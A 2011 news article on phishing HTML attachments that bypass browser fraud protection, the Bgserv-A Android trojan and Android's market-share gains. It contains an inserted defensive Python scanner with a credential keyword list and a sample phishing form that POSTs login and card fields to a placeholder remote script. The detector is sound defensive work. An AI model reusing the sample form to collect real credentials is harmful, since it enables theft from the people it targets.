New security flaw discovered in Chrome and Firefox
March 17, 2011
Recent phishing attacks targeting customers of PayPal and Bank of America succeeded in circumventing the fraud protections built into the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email.
According to M86 researcher Rodel Mendrez, the locally stored file opens a Web form that collects the customers' user ID and password, credit card numbers and other sensitive personal information. It then uses a simple POST request to send that data to a PHP application on a legitimate website that has been compromised.
By avoiding the use of "verbose GET requests" and known phishing sites, the scam works completely under the radar of these browsers' built-in fraud protection mechanisms.
“And while the POST request sends information to the phisher's remote Web server, Google Chrome and Mozilla Firefox didn't detect any malicious activity. As a result, months-old phishing campaigns remain totally undetected, so it seems that the tactic is very effective,” Mendrez explained.
There's really no technical reason why the browsers can't flag the URL that accepts the POST request. Mendrez suggested that such PHP URLs are rarely reported as abusive by end users because recognizing them in attacks like this requires technical expertise.
However, since the HTML code accompanying the file is not visible, the average user has little to go on, and the phishing attack works as intended.
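One way a mail gateway or incident responder could triage such attachments is to parse the HTML and flag any form that POSTs credential-style fields to a remote host, which is exactly what the browser blocklists miss. The example below is added here and is not M86's or the browsers' code; the sensitive field names and the sample attachment (with a placeholder URL) are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Input names that typically indicate credential or card collection (constructed list).
SENSITIVE_NAMES = {"password", "passwd", "pin", "ssn", "cardnumber", "card_number",
                   "ccnum", "cvv", "userid", "user_id", "login"}


class FormScanner(HTMLParser):
    """Collect every <form> with its action, method and the inputs it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action", "method", "fields": [(type, name)]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}    # attribute values may be None
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(), "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(((a.get("type") or "text").lower(),
                                            a.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html):
    """Return (action, reasons) for each form that POSTs sensitive fields to a remote host.
    Forms posting only locally, or collecting nothing sensitive, are not flagged."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    for f in scanner.forms:
        host = urlparse(f["action"]).netloc
        remote_post = f["method"] == "post" and bool(host)
        sensitive = any(t == "password" or n in SENSITIVE_NAMES for t, n in f["fields"])
        if remote_post and sensitive:
            hits.append((f["action"], [f"posts to remote host {host}", "collects credential/card fields"]))
    return hits


# Constructed sample standing in for an extracted e-mail attachment (placeholder URL).
SAMPLE_ATTACHMENT = """<html><body>
<form method="POST" action="http://example.com/PLACEHOLDER/collect.php">
  <input type="text" name="userid"><input type="password" name="password">
  <input type="text" name="cardnumber"><input type="submit" value="Log In">
</form>
<form method="get" action="/search"><input type="text" name="q"></form>
</body></html>"""
```

Running `suspicious_forms(SAMPLE_ATTACHMENT)` flags only the first form; the site-search form is ignored because it neither POSTs remotely nor collects sensitive fields.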
The technique is very similar to another one reported by M86 in February that embedded self-extracting archive files in phishing emails and also used compromised legitimate websites to bypass anti-phishing protections.
As an example, snack food maker Frito-Lay was one of the companies whose website was hacked to host the PHP script, Mendrez says. The malicious program has since been removed, Frito-Lay reported.
There was no mention of how Microsoft's Internet Explorer browser responds to the HTML forms, but it's fairly easy to assume that it may present similar Internet security issues, given Microsoft's history when it comes to security concerns in many of its software products.
In other security news, a group of virus and malware makers have released a new Trojan version of an Android clean-up tool released by Google earlier this week.
Google offered a new security update, a sort of a 'kill switch' that purged the DroidDream Trojan from infected mobile handsets just last weekend.
However, the DroidDream Trojan virus found its way onto the official Android marketplace, typically under the disguise of mobile games, using an exploit to infect an estimated 50,000 phones. The use of the exploit meant that the attack was effective against Google Android smartphones, even if they weren't jailbroken.
In a swift response, Google immediately pulled all the games from the marketplace. That stopped further infections from spreading but still failed to eradicate the infection from already compromised mobile handsets, hence the decision to push an over-the-air update: the Android Market Security Tool.
But sneaky 'V-Xers' have developed a back-doored version of this clean-up tool, dubbed 'Bgserv-A' by Internet security firms, and released through third-party Android marketplaces.
The Bgserv-A virus actually lifts the IMEI and the phone number from compromised handsets, uploading this information to a remote hacker-controlled server, much like the original Trojan.
And further analysis suggests that the Bgserv-A worm is also targeting users of Google's smartphones in China, where the sheer number of units can cause even more havoc for a greater number of users.
Infection is likely to lead to high data usage on infected devices, as well as posing a privacy risk. Built-in functionality in the malware also creates a means to send SMS text messages from infected devices, under instructions from a remote command-and-control server that can be located anywhere in the cloud.
A complete and detailed report of the malware can be found in blog posts on the Symantec website.
In other Android news, according to a new report released Tuesday from market research firm comScore, Google's Android operating system is now the most-used smartphone OS in the United States. This represents a fast race to the top from a platform that didn't even exist a little over two years ago.
About 31.3 percent of all smartphones in the United States ran Google's Android OS in January, says comScore. That outpaced the 30.5 percent of American smartphone owners who use RIM's BlackBerry phones.
The near 'rocket rise' of Android began in late October 2008, when HTC's G1 phone went on sale for T-Mobile USA users. The platform really started to take off when the Motorola Droid went on sale in November 2009. Google's mobile OS began in 2010 with just a small 7 percent share of the smartphone market, but Android has grown by an astounding two percentage points each month since. And the trend continues.
Android was in fourth place as recently as May 2010, but it outpaced Microsoft's Windows Mobile in June. In November, Android overtook Apple's iOS, which runs on the iPhone, iPod Touch and iPad. It finally conquered the mighty BlackBerry OS in the first month of 2011, easily surpassing an operating system that had more than a 42 percent share of the U.S. smartphone market barely a year ago.
Today, about 350,000 Android devices are activated each day, and there are more than 170 smartphones and tablets running Android, according to Google.
Overall, most of Android's spectacular success can be attributed to Google's open business licensing model. Google licenses its mobile OS for free, allowing wireless handset manufacturers to load the ready-made software onto their phones instead of paying a team of engineers to develop a proprietary platform.
Not only that, but they can also customize it and make as many modifications as needed as well. It's based on the open source concept, very much like the Linux operating system is.
So far, LG Electronics, HTC Corp, Samsung, Motorola and dozens of other mobile handset makers have jumped onto the Android bandwagon, and the ability to focus exclusively on the hardware has allowed device manufacturers to bring new phones to market much more quickly.
In fact, the time it takes smartphones to go from concept to store shelves has been halved thanks to "Android's new law," say some wireless industry observers that are close to Google.
Globally, Android beat BlackBerry last year, but it still trails Nokia's Symbian OS, according to Gartner. Nokia recently announced that it would drop its Symbian OS, which has been rapidly losing market share, for Microsoft's Windows Phone OS.
Nokia CEO Stephen Elop acknowledged that he had considered partnering with Google, but he said that Windows Phone offered more differentiation amid a sea of new Android devices.
At a press conference in London last month, Nokia CEO Stephen Elop and Microsoft's Steve Ballmer announced that Nokia will abandon its Symbian and Meego operating systems to instead adopt Microsoft's Windows Phone 7 OS. Windows Phone 7 will become the predominating operating system for Nokia smartphones from now on.
Most wireless industry observers agree that the strategy is a drastic one meant to fend off the growing momentum by mobile competitors Google's Android operating system and Apple's iOS.